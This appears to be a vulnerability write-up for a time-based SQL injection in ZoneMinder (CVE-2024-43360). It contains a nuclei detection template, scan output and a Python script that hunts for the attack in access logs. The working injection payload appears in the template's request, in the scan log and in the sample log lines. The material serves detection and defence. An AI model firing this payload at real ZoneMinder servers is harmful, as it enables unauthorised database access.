ZoneMinder is a free, open source closed-circuit television software application developed for Linux which supports IP, USB and analog cameras. ZoneMinder v1.36.33 and v1.37.43 are affected by a SQL injection vulnerability. Advisory link below:
GHSA-9cmr-7437-v9fj
Nuclei Template:
```yaml
id: CVE-2024-43360

info:
  name: ZoneMinder time based sql injection detection
  author: securitytaters
  severity: Critical
  description: |
    Zoneminder v1.36.33 and v1.37.43 are affected by a SQL Injection vulnerability.
  reference:
    - http://
  tags: cve2024,cve,zoneminder,sqli

variables:
  username: ''

http:
  - raw:
      - |
        @timeout: 20s
        GET /index.php?limit=20&mid=(select*from(select(sleep(14)))a)&order=desc&request=watch&sort=Id&view=request HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration>=14'
          - 'status_code == 200'
          - 'contains_all(body,"{\"result\":\"Ok\",\"rows\":[")'
          - 'contains_all(content_type,"application/json")'
        condition: and
```
Template results
[VER] Started metrics server at localhost:9092
[WRN] Found 32 template[s] loaded with deprecated paths, update before v3 for continued support.
[INF] Current nuclei version: v3.3.1 (outdated)
[INF] Current nuclei-templates version: v9.9.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 56
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[VER] [CVE-2024-43360] Sent HTTP request to http://localhost:8000/index.php?limit=20&mid=(select*from(select(sleep(14)))a)&order=desc&request=watch&sort=Id&view=request
[CVE-2024-43360] [http] [critical] http://localhost:8000/index.php?limit=20&mid=(select*from(select(sleep(14)))a)&order=desc&request=watch&sort=Id&view=request
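For defenders, the request this template sends can be hunted for in web server access logs. The script below is an added example, not part of the original issue or of the ZoneMinder or nuclei projects: it flags `view=request&request=watch` calls whose `mid` parameter is not a plain integer. It assumes combined-format access logs and that a legitimate `mid` is a numeric monitor ID; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Matches the client IP, request target and status of a combined-format log entry.
ENTRY_RE = re.compile(
    r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) '
)

# Constructed sample entries (documentation IP ranges), not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Sep/2024:10:00:01 +0000] "GET /index.php?view=request'
    '&request=watch&mid=3&limit=20 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Sep/2024:10:00:05 +0000] "GET /index.php?limit=20'
    '&mid=(select*from(select(sleep(14)))a)&order=desc&request=watch&sort=Id'
    '&view=request HTTP/1.1" 200 87 "-" "-"',
    '198.51.100.7 - - [01/Sep/2024:10:00:40 +0000] "GET /zm/index.php?view=request'
    '&request=watch&mid=%28select%2Afrom%28select%28sleep%2814%29%29%29a%29'
    ' HTTP/1.1" 200 87 "-" "-"',
    '192.0.2.10 - - [01/Sep/2024:10:01:00 +0000] "GET /index.php?view=console'
    ' HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

def suspicious_watch_requests(lines):
    """Return (ip, status, mid) for request=watch calls with a non-numeric mid."""
    hits = []
    for line in lines:
        entry = ENTRY_RE.match(line)
        if entry is None:
            continue  # skip lines that are not access-log entries
        url = urlsplit(entry["target"])
        if not url.path.endswith("/index.php"):
            continue
        # parse_qs percent-decodes values, so URL-encoded variants are normalised.
        params = parse_qs(url.query)
        if "request" not in params.get("view", []):
            continue
        if "watch" not in params.get("request", []):
            continue
        for mid in params.get("mid", []):
            # Assumption: a legitimate mid is a decimal monitor ID.
            if not re.fullmatch(r"[0-9]+", mid):
                hits.append((entry["ip"], int(entry["status"]), mid))
    return hits

if __name__ == "__main__":
    for ip, status, mid in suspicious_watch_requests(SAMPLE_LOG):
        print(f"{ip} status={status} mid={mid!r}")
```

A hit with status 200 corresponds to the condition the template's matchers check; if the server also logs request duration, correlating hits with unusually long response times narrows the results further.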